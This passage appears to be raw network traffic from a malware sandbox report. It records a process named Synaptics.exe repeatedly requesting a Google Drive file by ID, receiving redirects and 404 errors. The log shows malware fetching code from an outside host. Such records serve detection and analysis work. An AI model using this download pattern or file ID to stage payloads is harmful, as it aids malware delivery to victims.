                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      47          192.168.2.11  49938        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:44 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:44 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MX-6qPEeY_5e2c21hK8IUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      48          192.168.2.11  49942        142.250.181.225  443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:44 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:45 UTC  1243               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7Dty4-IaLGjwdlXiIAYppWibQFM7vQai4m69uZ3k7_TD_4wCFuJ_BJ1mhyhmP0Fgm_
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sRJjcQAbP00dM9LDOzoawg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:45 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:45 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="6s7jBmk_Q9_RgL1lj1nlCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:45 UTC  115                IN         Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      49          192.168.2.11  49948        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:44 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:45 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-r99E_9DKji3B0txk2UaTuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      50          192.168.2.11  49949        142.250.181.225  443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:44 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:45 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC418X1USi24Bw7w0INA1ioDTjvJc9d__D49ZEzlcl-ewiJi4WOG6ss0wxAZTgjyWDugCpw0iP8
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-eYKfmEPJlh6HOX7era-ueQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:45 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:45 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="gVrV7dHI8ofWQjhkrNPrfA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:45 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      51 | 192.168.2.11 | 49950 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:45 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Rxhu-n1JtOf-lwFea3Ea1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      52 | 192.168.2.11 | 49956 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:45 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:46 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6i05ZmoSTcfdBDubAg_ZLwyrl3uQP93IheTvSsGiO9PcKO0GIgCv68TVF8RzQQaAXfCL-IkJ0
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:45 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kJB-Bp7LAYnITYsJE7t17A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:46 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:46 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="QN7iH2Ti9ULeeLBP53pLnw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:46 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      53 | 192.168.2.11 | 49957 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:45 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
                                                                                                                                                      2024-12-30 10:25:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JEEB80Ht4uJKQLGdEggszg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      54 | 192.168.2.11 | 49958 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:45 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:46 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC7AhhjpIL1Bq8HwZ7Hj_f8FmM_qaYZx-sWoEo9UUtDn_9o-K5Zkk5P6h7F7YrZ8dJMzZYGHB5E
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-OP74qrCDO80YX0KNG1IzYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:46 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:46 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="vOYGbDuZoC5mglJVZmknAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:46 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      55 | 192.168.2.11 | 49964 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:46 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
2024-12-30 10:25:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:46 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-hMqgeYX20jZACEhypk8WOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.11 | 49966 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:46 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
